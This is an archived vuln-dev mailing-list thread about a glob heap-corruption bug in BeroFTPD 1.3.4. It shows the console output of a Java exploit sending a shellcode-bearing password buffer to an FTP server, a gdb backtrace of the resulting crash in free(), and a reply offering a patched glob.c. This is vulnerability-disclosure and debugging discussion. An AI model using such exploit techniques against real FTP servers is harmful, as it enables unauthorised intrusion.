re: Older BeroFTPD glob

From: KF (dotslash@snosoft.com)
Date: 01/02/70


Date: Thu, 01 Jan 1970 18:09:19 -0500
From: KF <dotslash@snosoft.com>
To: eduardo.cruz@tsg.com, vuln-dev@security-focus.com

In eduardos reply I did not find it clear that BeroFTPD 1.3.4 was or was
not vuln by default compile. I compiled it from the latest source on
the wu-ftpd.org ftp server. Bare with no patches I get the following
result... which was the same with earlier versions. Again I am on a ppc
linux box:

[root@ibook root]# java wuwarez 42424242 0 localhost anonymous
Shellcode is 44 bytes long
return is 42424242
Got Socket
Sleeping so that you can attach a debugger
220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003) ready.
Sending username
331 Guest login ok, send your complete e-mail address as password.
sending mal buffer as the passwd
;230 Guest login ok, access restrictions apply.
Populate Heap...needs more work
(program exit)
[root@ibook root]#

(This is what we saw when we attached the debugger)

[root@ibook src]# ps -ef | grep ftpd
ftp 2035 790 0 14:55 ? 00:00:00 ftpd:
localhost.localdomain: anonymous
[root@ibook src]# gdb ./ftpd 2035
Program received signal SIGSEGV, Segmentation fault.
0xfeb6cfc in free () from /lib/libc.so.6
(gdb) bt
#0 0xfeb6cfc in free () from /lib/libc.so.6
#1 0x10010b58 in blkfree (av0=0x42424242) at glob.c:604
#2 0x1000dd04 in yyparse () at ftpcmd.y:1246
#3 0x10002cac in main (argc=268566528, argv=0x7ffffc74,
envp=0x1003e828) at ftpd.c:1221
#4 0xfe5e308 in __libc_start_main () from /lib/libc.so.6

Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035

-KF

From: "Eduardo Cruz" <eduardo.cruz@tsg.com> <mailto:eduardo.cruz@tsg.com>
Date: Sun Dec 09, 2001 05:00:10 AM US/Pacific
To: "KF" <dotslash@snosoft.com> <mailto:dotslash@snosoft.com>,
<vuln-dev@security-focus.com> <mailto:vuln-dev@security-focus.com>
Subject: Re: Older BeroFTPD glob

Connected to localhost.
220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001)
ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have
any
230-unusual problems, please report them via e-mail to root@cimitarra
<mailto:root@cimitarra>
230-If you do have problems, please try using a dash (-) as the first
character
230-of your password -- this will turn off the continuation messages that
may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
550 Missing }
ftp>

just patch glob.c ur self, or use the mine already patched (attached).
And about the maintenance of beroftp, as far as i know is not being done
since years ago.
Anyway appart from the bugs derivating from vuftpd i dont see the point on
maintaining bero, i find it quite perfect like it is.

have fun



Relevant Pages

  • Re: Older BeroFTPD glob
    ... And past and future "standard" wuftpd bugs will affect beroftpd. ... > 331 Guest login ok, send your complete e-mail address as password. ... This is an experimental FTP server. ...
    (Vuln-Dev)
  • Re: Older BeroFTPD glob
    ... 331 Guest login ok, send your complete e-mail address as password. ... This is an experimental FTP server. ... remote server has closed connection ...
    (Vuln-Dev)
  • Re: ftp command does what...?
    ... bash-2.05b$ ftp ftp.andrew.cmu.edu ... 331 Guest login ok, ... 230-You are user #78 of 450 simultaneous users allowed. ...
    (freebsd-questions)
  • Re: commit PR 154469, ftp-proxy(8) bug ?
    ... Does the patch from OpenBSD fix the problem for you? ... FTP client: ... 331 Guest login ok, send your email address as password. ... .Z..`.2 QUIT ...
    (freebsd-stable)
  • Re: OT: Technical question
    ... Tom uses a company called Hostway to host his website. ... I've tried direct ftp on a dos window and even installed a second ftp ... 331 Guest login ok, send your complete e-mail address as password. ...
    (rec.pets.cats.anecdotes)